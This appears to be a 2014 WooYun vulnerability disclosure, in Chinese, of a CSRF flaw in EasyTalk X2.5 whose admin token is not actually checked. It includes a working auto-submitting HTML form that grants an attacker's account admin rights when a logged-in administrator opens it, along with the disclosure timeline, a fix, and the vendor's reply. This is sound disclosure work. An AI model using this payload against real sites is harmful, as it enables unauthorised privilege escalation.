当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-055324

漏洞标题:EasyTalk_X2.5 csrf 可添加后台管理员

相关厂商:nextsns.com

漏洞作者: 梧桐雨

提交时间:2014-04-02 17:02

修复时间:2014-07-01 17:03

公开时间:2014-07-01 17:03

漏洞类型:CSRF

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-02: 细节已通知厂商并且等待厂商处理中
2014-04-02: 厂商已经确认,细节仅向厂商公开
2014-04-05: 细节向第三方安全合作伙伴开放
2014-05-27: 细节向核心白帽子及相关领域专家公开
2014-06-06: 细节向普通白帽子公开
2014-06-16: 细节向实习白帽子公开
2014-07-01: 细节向公众公开

简要描述:

看似加了token,实际呢?

详细说明:

今天下载EasyTalk_X2.5回来本地,简单的测试了下。
发现问题不少,节选一个较为严重的发布。
添加管理员的时候,同时抓取数据包:
发现是有加token的:
__hash__:f36f2eb0cdb9794c6690722c0b6662ec_d59a5553239cc1aaea736ff3340579a5
那么实际上,去掉是否能添加呢?
答案是:可以
测试添加管理员代码:

<form action="http://localhost/EasyTalk_X2.5/admin.php?s=/Users/edituser" method="post" name="wutongyu" id="wutongyu">
<input type="text" name="user_name" value="wutongyu"/>
<input type="text" name="user[nickname]" value="wutongyu"/>
<input type="text" name="user[isadmin]" value="1"/>
</form>
<script>
document.wutongyu.submit();
</script>


漏洞证明:

首先先注册一个普通用户。
管理员没访问之前是这样的:

1.jpg


访问了上面的poc之后:

2.jpg

修复方案:

一定得验证token,否则加了也是白搭。

版权声明:转载请注明来源 梧桐雨@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-04-02 20:36

厂商回复:

得需要管理员登陆后才能这样操作

最新状态:

暂无